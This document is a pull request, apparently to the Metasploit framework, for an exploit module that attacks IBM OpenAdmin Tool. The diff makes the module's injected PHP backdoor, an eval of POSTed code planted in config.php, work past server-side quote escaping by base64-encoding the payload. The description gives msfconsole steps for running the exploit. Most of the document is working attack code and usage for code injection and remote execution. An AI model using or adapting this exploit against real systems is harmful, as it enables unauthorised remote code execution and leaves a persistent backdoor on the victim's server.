### PR TITLE
Base64 enc payload to bypass escaping quotes etc.

### DIFF
--- a/modules/exploits/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec.rb
+++ b/modules/exploits/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec.rb
@@ -93,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     cmd_param = Rex::Text.rand_text_alpha(rand(10) + 6)
 
-    res = set_home_page "\";eval($_POST['#{cmd_param}']); #"
+    res = set_home_page "\";eval(base64_decode($_POST['#{cmd_param}'])); #"
 
     unless res
       vprint_status "#{peer} Connection failed"
@@ -109,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status "#{peer} Executing payload..."
     send_request_cgi({ 'method'    => 'POST',
                        'uri'       => normalize_uri(target_uri.path, 'conf', 'config.php'),
-                       'vars_post' => { cmd_param => payload.encoded } }, 5)
+                       'vars_post' => { cmd_param => Rex::Text.encode_base64(payload.encoded) } }, 5)
 
     print_warning "#{peer} Replace the 'config.php' file with 'BAKconfig.php' to remove the backdoor"
   end


### PR DESCRIPTION
The second step (POST with payload) of this module wasn't working as-written as the server was escaping out quotes etc.

Added b64 decoding/encoding to injected code in step 1 and step 2 payload to bypass server-side escaping of quotes etc.

## Verification

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec`
- [ ] set `rhosts`, `rport`, `payload`, `payload` options as required
- [ ] `run`
- [ ] confirm payload executed.

